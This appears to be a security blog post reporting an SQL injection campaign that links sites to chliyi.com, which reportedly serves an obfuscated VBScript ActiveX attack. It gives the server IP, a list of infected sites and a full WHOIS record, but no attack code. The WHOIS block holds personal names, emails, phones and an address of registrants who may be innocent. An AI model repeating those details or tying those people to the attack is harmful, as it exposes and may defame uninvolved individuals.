Reportedly, this launches some sort of ActiveX attack via obfuscated VBscript. This is another good reason not to use Internet Explorer, as most other browsers do not support ActiveX and are not vulnerable.
Unlike some other recent injection attacks, this one seems to use a legitimate domain called chliyi.com - unfortunately for the bad guys, the registration on the domain is going to run out pretty soon.
The IP address of the server is 218.30.96.87 which is not in the Spamhaus DROP list which indicates again that the chliyi.com might well be legitimate, just compromised.
Domain Name.......... chliyi.com
Creation Date........ 2003-06-12 11:21:39
Registration Date.... 2003-06-12 11:21:39
Expiry Date.......... 2008-06-12 11:21:39
Organisation Name.... junrong shen
Organisation Address. dongxiaoqiao3-1-104
Organisation Address.
Organisation Address. suzhou
Organisation Address. 215006
Organisation Address. JS
Organisation Address. CN
Admin Name........... shen junrong
Admin Address........ dongxiaoqiao3-1-104
Admin Address........
Admin Address........ suzhou
Admin Address........ 215006
Admin Address........ JS
Admin Address........ CN
Admin Email.......... wzh@hisuzhou.com
Admin Phone.......... +86.51265678898
Admin Fax............ +86.51257306265
Tech Name............ zhihui wang
Tech Address......... suzhou
Tech Address.........
Tech Address......... suzhou
Tech Address......... 215021
Tech Address......... JS
Tech Address......... CN
Tech Email........... wzh@hisuzhou.com
Tech Phone........... +86.5169697639
Tech Fax............. +86.5167621807
Bill Name............ zhihui wang
Bill Address......... suzhou
Bill Address.........
Bill Address......... suzhou
Bill Address......... 215021
Bill Address......... JS
Bill Address......... CN
Bill Email........... wzh@hisuzhou.com
Bill Phone........... +86.5169697639
Bill Fax............. +86.5167621807
Name Server.......... dns22.hichina.com
Name Server.......... dns21.hichina.com
This is another attack that goes to show that "there is no such thing as a safe site". A scan of the Google results comes up with some interesting (and alarming) infected sites:
- forces.ca - Canadian military
- paramountcomedy.com - Paramount Comedy (Cable TV channel)
- kcsg.com - KCSG (Utah TV station)
- umnh.utah.edu - University of Utah
- digital.lib.ecu.edu - East Carolinia Unitersity
- chapel.duke.edu - Duke University
- drdrew.com - Dr Drew (relationship advice)
- gisp.org - Global Invasive Species Program
- sciencescotland.org - Royal Society of Scotland
- moffitt.org - H. Lee Moffitt Cancer Center and Research Institute
- confetti.co.uk - Confetti (Wedding planning)
- buildabear.com - Build-a-Bear Workshop
- delluniversity.com - Dell
- trelleborg.com - Trelleborg AB (Polymer manufacturer)
This is not a comprehensive list of infected sites, and many of these sites will have been cleaned up.
If you are running an SQL server, then the rule is to secure your inputs, else you will get attacked again and again.